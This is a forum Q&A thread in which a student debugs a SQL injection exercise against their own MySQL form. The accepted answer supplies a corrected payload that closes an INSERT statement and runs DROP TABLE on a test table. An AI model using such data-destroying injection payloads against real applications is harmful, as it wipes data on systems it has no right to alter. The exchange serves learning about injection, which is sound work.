# SQL injection Syntax error trying to Drop a table

Tags: mysql, syntax-error, sql-injection

So I'm working on an assignment and as part of that, performing an SQL injection on a table i named test, from a form that's used to input values in a table named students.

I've been trying

```
 '; DROP TABLE test; --
```

I get this error

```
Error: INSERT INTO student (student_id, first_name, last_name, DOB, sex, phone, user_id) VALUES ('nhdb', ''; DROP TABLE test; -- ', '', '', '', '', 'u01')
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
'; DROP TABLE test; -- ', '', '', '', '', 'u01')'
at line 1
```

Originally i was trying to drop the students table, but when I was testing whether the user had the right to drop that table, there were foreign key constraint issues. So I put together a table named test, which can be dropped by the user with no issues.

Any guidance on where i'm going wrong here? I'm sure `'; DROP TABLE test; --` should work.

Answer (score 0, accepted):

It fails because the rest of the `INSERT`-values are commented out in your example. Seven Values are expected but only two provided.
Also the closing bracket `)` is missing.

Because the `INSERT` fails, the `DROP` isn't executed too.

This should work:

```
', '', '', '', '', ''); DROP TABLE test; --
```

Answer (score 0):

```
INSERT INTO student (student_id, first_name, last_name, DOB, sex, phone, user_id)
 VALUES ('nhdb', ''; DROP TABLE test; -- ', '', '', '', '', 'u01')
```

It is because you are:

1. missing a closing bracket after `'nhdb, ''`
2. Trying to execute two statements in one query, and one of them a DDL statement, not a query
3. Missing five arguments in the `VALUES` clause.
4. Trying to insert a DROP statement into the middle of an INSERT statement.

This does not even begin to be valid SQL.